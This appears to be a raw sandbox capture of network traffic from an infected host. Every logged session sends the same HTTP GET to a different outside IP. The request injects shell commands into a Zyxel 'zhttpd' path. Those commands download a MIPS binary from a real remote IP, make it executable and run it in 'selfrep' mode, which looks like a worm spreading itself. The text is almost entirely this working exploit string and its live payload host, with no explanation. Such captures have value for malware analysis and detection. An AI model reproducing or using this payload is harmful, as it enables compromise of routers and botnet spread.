                                                Jan 12, 2024 18:24:20.470899105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                518192.168.2.1334932166.78.145.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470918894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                519192.168.2.135929854.253.130.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470956087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                520192.168.2.13445602.36.255.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.470988989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                521192.168.2.1332812186.211.212.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471010923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                522192.168.2.1335740163.31.199.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471061945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                523192.168.2.135983469.192.246.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471086025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                524192.168.2.135488071.164.101.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471139908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                525192.168.2.134841044.152.226.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471163034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                526192.168.2.1354408155.195.137.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471196890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                527192.168.2.1353864133.163.212.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471231937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                528192.168.2.1355026209.56.17.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471285105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                529192.168.2.13425368.19.244.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471303940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                530192.168.2.134637280.117.81.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471334934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                531192.168.2.1348950114.197.147.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471369028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                532192.168.2.1355484185.254.186.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471400976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                533192.168.2.1338076187.59.196.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471436024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                534192.168.2.133670839.26.12.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471457958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                535192.168.2.1353056178.196.213.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471488953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                536192.168.2.135672477.100.129.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471545935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                537192.168.2.1337432141.160.24.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471610069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                538192.168.2.133347074.31.179.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471647024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                539192.168.2.13449224.133.86.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471664906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                540192.168.2.135093686.24.72.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471702099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                541192.168.2.1344810211.134.12.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471740007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                542192.168.2.133362490.129.113.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471781015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                543192.168.2.134071617.226.98.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471822977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                544192.168.2.135838085.141.243.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471863985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                545192.168.2.1334828130.19.2.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471880913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                546192.168.2.1356926150.217.210.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471931934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                547192.168.2.134050246.233.32.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471971989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                548192.168.2.1345296155.14.98.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.471993923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                549192.168.2.1337382138.235.138.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472043037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                550192.168.2.133376297.160.3.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472095966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                551192.168.2.135362657.17.105.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472116947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                552192.168.2.1350100135.37.251.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472167969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                553192.168.2.1358746163.195.56.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472215891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                554192.168.2.1346916151.220.36.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472225904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                555192.168.2.133979099.69.34.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472264051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                556192.168.2.135895480.152.5.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472311020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                557192.168.2.135406045.41.128.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472341061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                558192.168.2.1339068113.11.123.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472438097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                559192.168.2.1342000164.226.41.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472438097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                560192.168.2.1334112174.5.121.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472450972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                561192.168.2.1336088130.144.14.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472503901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                562192.168.2.1341954170.247.52.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472553968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                563192.168.2.135399018.94.186.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472582102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                564192.168.2.1347446195.116.160.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472611904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                565192.168.2.1360758197.55.166.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472678900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                566192.168.2.135510450.186.21.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472718000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                567192.168.2.135029894.21.81.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472755909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                568192.168.2.1340178186.97.177.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472801924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                569192.168.2.135414481.87.57.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472841978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                570192.168.2.13521722.160.244.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472886086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                571192.168.2.1342514168.78.133.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472955942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                572192.168.2.135465663.222.34.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472959042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                573192.168.2.133829461.228.236.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.472985029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                574192.168.2.1355088145.203.38.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473018885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                575192.168.2.135433646.83.202.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473059893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                576192.168.2.1353696180.125.22.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473099947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                577192.168.2.134799625.165.162.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473151922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                578192.168.2.134335859.223.187.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473181963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                579192.168.2.1339900167.180.212.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:20.473217964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                580192.168.2.134019037.2.39.80443
                                                TimestampBytes transferredDirectionData
